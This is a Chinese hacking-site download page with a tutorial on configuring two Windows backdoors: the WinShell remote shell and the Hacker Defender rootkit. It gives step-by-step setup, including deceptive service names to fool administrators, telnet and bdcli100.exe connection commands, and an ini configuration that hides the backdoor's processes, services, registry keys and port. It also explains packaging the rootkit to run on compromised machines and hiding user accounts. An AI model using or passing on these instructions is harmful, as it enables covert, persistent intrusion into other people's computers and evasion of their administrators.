下载月排行
立即下载两款经典的DOS下后门
| 软件大小: | 29.5 MB |
|---|---|
| 软件语言: | 简体中文 |
| 软件类别: | 黑客教学 - 黑客动画 |
| 授权方式: | 共享版 |
| 应用平台: | Win9X/2000/XP/2003/ |
| 更新时间: | 2008/8/19 13:44:31 |
| 开 发 商: | 暂无信息 |
| 联 系 人: | 暂无联系方式 |
| 分享收藏 | |
| 解压密码: | 本站默认解压密码:www.987654321sf.com |
| 推荐等级: |  |
| 会员中心: | 【账号登录】 【账号注册】 开通VIP下载流程 |
| 查毒情况: |  |
[复制下载页面地址给QQ/MSN上的好友]软件介绍
大家好,今天给大家做的动画是两款经典DOS下后门的配置和使用。
1.winshell 很强大的DOS下的后门连接工具
2.rootkit 超级隐蔽的DOS下的后门连接工具
㈠winshell
首先我们看如何配置,看程序主界面 ,这就是我们这款用到的工具
port 连接时的端口
password 连接密码
password Banner 欢迎信息
SVCname 服务名称
DISplayname 显示名称
Description 服务描述
RegKeyName 注册表名称
DownExec 运行后下载指定文件 与Url Address和Destination Filename 下载地址、程序名对应
Autoinstall 自动安装
Compress WinshellServer 压缩文件
好了,说明大家可以下面自己去看,我这里生成一个服务端给大家。服务名称这些我就先不改了,大家可以自己修改,起一些比较有诱惑性的名字,防止让管理员发现。运行后下载程序和压缩,这里我就不选上了,就选择自动安装就可以了,配置完成后,会弹出一个配置的信息。关闭就可以了。OK,我把这个生成的服务端传到虚拟机上,然后我们运行他,在连接
我们运行,OK运行完了,我们用TELNET进行连接。
连接方法:telnet IP 端口,输入密码 192.168.59.128 连接成功,这个时候要立刻输入密码,否者就会自动退出
,连接成功。我们可以输入?查看这款工具的使用命令
,下面的命令,我都用中文写了翻译。
WinShell v5.0 (C)2002 janker.org
? for help
CMD>?
i Install (远程安装功能,当你仅仅执行winshel而没有安装winshell的时候)
r Remove (远程反安装功能,注意此命令并不终止winshell的运行)即卸载
p Path (查看winshell主程序的路径信息)
b reBoot (重新启动机器) 我就不尝试了,呵呵
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\>”,这正是winshell提供的telnet服务功能)
x eXit (退出本次登录会话,注意此命令并不终止winshell的运行)
q Quit (终止WinShell的运行,注意此命令并不反安装WinShell) 大家可以自己慢慢看
以上是winshell连接后的使用命令,通常我们就是输入S得到CMDSHELL进行操作,相信得到CMDSHELL后,大家都懂得下一步该做什么吧。。。好了,这一款工具就简单的讲到这里,希望大家能灵活运用。有什么不懂的地方,可以来问我,等一下,我接着做下一款工具的使用,是超级具有隐蔽性的工具。。。
下面我们接着来讲下一款超级强大的工具
㈡rootkit
rootkit这款后门的特点就是比较隐藏,平时不开放任何端口。使用对方正在工作的任何一个端口就可以建立连接。可以隐藏文件的进程、端口、服务名称、注册表键值等。
hxdef100.exe 是主程序,不要在主机上运行。不然很难卸载。
hxdef100.ini 配置文件
bdcli100.exe 本机连接肉鸡用的程序
首先我们打开这款工具的配置文件,我简单的介绍一下其中重要的选项.
[Hidden Table] ; 要隐藏的列表,支持通配符,比如这里所有以hxdef 开头的都将不在任务管理器及资源
管理器里出现,大家可以自己在这里添加要隐藏的文件,一个一行.
我们这里接着上面的winshell来说,当winshell运行后,它会写入注册表,会加载到进程里,并且在服务里面也有,
我们来看一下是不是这样。看,这样如果信心的管理员就会很轻易的发现我们的后门,还有 winshell也会开放端口
加载到进程当中,大家都看到了吧? 这样,我们通过我们这款rootkit就可以完全把这些全部隐藏掉
下面我都是已隐藏winshell为事例进行讲解
通配符的意思就是所有以winshell开头的程序都隐藏
[Root Processes] ;要隐藏的进程,支持通配符,我喜欢用winshell,那就把winshell.exe 加到rcmd.exe ;
下面,这样在进程里就将不会看到winshell.exe
[Hidden Services] ;这里是要隐藏的服务,支持通配符,winshell的服务隐藏那就在Defender*下加winshell;
[Hidden RegKeys] ; 隐藏注册表项,我这里是隐藏winshell,那就添
WinShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
这个是我的winshell在注册表里的位置,你可以找到你自己的后门所在注册表的位置,然后复制
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinShell
然后在配置里 先添写注册表项的名字,在添路径
[Hidden Ports];隐藏的端口 winshell连接端口是2007,我们就添2007隐藏这个端口
,这个后面可以添写多个端口,中逗号隔开。。
[Settings]
Password=****** ;这里设置连接后门用密码,大家自己改.这样都添写好了,我们就算配置完成了
首先在本机设置好hxdef100.ini,然后把hxdef100.exe和hxdef100.ini做成rar格式!再做成自解压格式。hxdef100.exe解压运行此程序.这样在肉鸡上执行这个自解压文件。看下效果。OK 我们运行他,看运行以后,是不是在服务中、注册表中、进程中,都会小时,而且查看端口也没有我们的2007端口呢 好了,运行完了 我们看
看刷新过后,注册表里已经没有了吧?我们在看服务,服务里也没有了吧?我们在查看端口 ,看2007也没有, 进程里也没有了!怎么样???这款工具很强大吧? 心动了没? 最后我们测试一下,虽然这些都隐藏了,但是我们如果用winshell连接不上的话,那这些启不是都白做了??? 怎么样??完全没有问题! 没问题吧!下面还有一个更强大的功能,这款工具rootkit这款后门的特点就是比较隐藏,平时不开放任何端口。使用对方正在工作的任何一个端口就可以建立连接。
我们可以连接对方开的任何一个端口 比如135 吧 我们试一下
bdcli100.exe 这个是他的连接工具 我的机器有点卡了。。。
连接的命令是:bdcli100.exe IP 端口 密码 等待连接
快吧??怎么样? 好了,这款工具真的很强大,更多利用要靠大家自己发挥了,比如建立隐藏帐号,虽然在本地用户和组,还有DOS下都查看不到,但是在注册表里还是可以查看的到!那样我们就可以利用这款工具,把他在注册表里进行隐藏。。。
好了,教程就做到这里。。。如果有什么问题的话,可以加我的群。47688744 前天刚建的。。。有什么问题来这里讨论吧。。。好了,我们下次再见。。。。